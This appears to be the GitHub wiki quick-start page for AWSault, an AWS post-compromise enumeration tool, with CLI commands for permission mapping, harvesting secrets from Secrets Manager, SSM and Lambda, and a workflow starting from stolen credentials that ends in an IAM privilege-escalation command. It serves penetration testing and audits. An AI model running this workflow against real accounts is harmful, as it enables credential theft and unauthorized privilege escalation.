Quick Start - baeziy/AWSault GitHub Wiki

Quick Start

Prerequisites

  1. AWSault is installed
  2. AWS credentials are configured (see Credentials)

Your first scan

Surface scan (default)

awsault

This fires read-only API calls across 120+ AWS services and reports which ones your credentials can access. Takes 30-60 seconds depending on your connection.

Surface scan with a specific profile

awsault --profile staging

Full assault

awsault --godeep

This runs all five phases:

  1. Surface scan (permission mapping)
  2. Deep enumeration (resource config pulling)
  3. Security audit (misconfiguration detection)
  4. Loot extraction (secret harvesting)
  5. Identity recon (privilege escalation path detection)

After the scan, you also get Suggested Next Steps with ready-to-copy AWS CLI commands for every service where you have access.

Full assault with HTML report

awsault --godeep --all-regions --output report.html

Scan specific services only

awsault --services iam,s3,ec2,lambda,rds

After scanning

Browse surface scan results

# what IAM permissions do you have?
awsault --show iam

# check multiple services
awsault --show iam,s3,lambda

# see everything
awsault --show all

Drill into specific data

# view the actual IAM users data
awsault --show iam --detail list_users

# view S3 buckets
awsault --show s3 --detail list_buckets

Browse deep scan data

After a --godeep scan, revisit the results anytime without rescanning:

# view identity, policies, roles, and privesc paths
awsault --recon

# view security audit findings
awsault --findings

# view extracted secrets and credentials
awsault --loot

# view everything at once
awsault --recon --findings --loot

Export without rescanning

# export last scan to different formats
awsault --output results.json
awsault --output results.csv
awsault --output results.html

What to look at first

After a --godeep scan, focus on:

  1. Privilege escalation paths — shown at the bottom of the recon output. These are your fastest route to higher access.
  2. Security findings — sorted by severity (CRITICAL first). Public S3 buckets, open security groups, admin policies.
  3. Loot — secrets from Secrets Manager, SSM parameters, Lambda env vars. Often contain database credentials or API keys.
  4. Assumable roles — if you can assume a role with more permissions, that's your lateral movement path.
  5. Suggested next steps — AWSault generates concrete aws CLI commands you can copy-paste.

Typical pentesting workflow

# step 1: quick recon with stolen creds
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
awsault

# step 2: full deep dive
awsault --godeep --output initial_recon.html

# step 3: check specific services of interest
awsault --show iam
awsault --show s3 --detail list_buckets

# step 3b: review deep data anytime
awsault --recon              # who am i, what can i do, how can i escalate
awsault --findings           # what's misconfigured
awsault --loot               # what secrets were found

# step 3c: read specific policy documents live from AWS
awsault --policy S3Access                 # read an inline or managed policy
awsault --policy S3Access,DbRead          # read multiple at once
awsault --policy S3Access --user admin    # read a policy on a different user
awsault --policy S3Access --role SomeRole # read an inline policy on a role
awsault --policy S3Access --version v2    # read a specific managed policy version
awsault --all-policies                    # dump every policy on current identity
awsault --all-policies --role BackendRole # trust policy + all attached policies on a role

# step 4: if privesc found, escalate and rescan
aws iam set-default-policy-version --policy-arn <arn> --version-id v2
awsault --godeep --output post_escalation.html

AWSault — AWS Post-Compromise Enumeration Tool | Created by baeziy | Report Issues | GPL-3.0

⚠️ **GitHub.com Fallback** ⚠️